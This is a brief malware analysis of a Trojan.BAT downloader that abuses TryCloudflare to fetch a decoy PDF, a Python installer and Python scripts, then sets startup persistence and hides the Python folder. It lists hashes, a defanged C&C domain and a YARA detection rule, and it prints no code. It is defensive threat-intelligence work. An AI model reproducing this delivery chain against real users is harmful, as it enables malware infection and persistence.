Important elements of the analysis:
- Trojan Downloader script
- Downloader C&C domain
- PowerShell downloading function calls
- Python downloading and silent installation
- Python scripts downloading and execution
In the present article we will analyze a new Trojan.BAT downloader malware sample. The script points to the downloader URL comparison-applied-tabs-treasure[.]trycloudflare[.]com
The first downloaded file URL path is related to "/pdf/office365.pdf" and the output file destination is set to %TEMP%\office365.pdf, then the file is downloaded through PowerShell with TLS1.2 to avoid downloading errors.
Then, Python installer 3.12.5 is downloaded from the C&C URL and installed with user rights:
The Python scripts xw.py, ap.py and vr.py are downloaded from the C&C domain and saved in the Python installation directory and executed. The update.cmd script is downloaded from the malicious domain and executed with OS startup for persistence:
In conclusion of the script the Python installation folder is hidden:
The C&C domain is currently offline:
The script in question is recognized as malicious by OSINT sources and labeled as TrojanDownloader/BAT.Agent.fb:
In this case the malware in question abuses TryCloudflare service to deliver the artifacts with the downloader script and execute them.
IOCs:
- b1b9ab4c00a571dbd60efb68a9cc580615a5f645018683708c1c713774186e77
- 7b5c426d621f2127cdca95e009b10481cc9f47c0
- 1b599093750d55ebb9839260bd3d78b9
- comparison-applied-tabs-treasure[.]trycloudflare[.]com
- xw.py
- ap.py
- vr.py
YARA Rule:
rule TrojanBAT_19072025
{
strings:
$str = "comparison-applied-tabs-treasure"
$hex = { 63 6f 6d 70 61 72 69 73 6f 6e 2d 61 70 70 6c 69 65 64 2d 74 61 62 73 2d 74 72 65 61 73 75 72 65 }
condition:
$str or $hex
}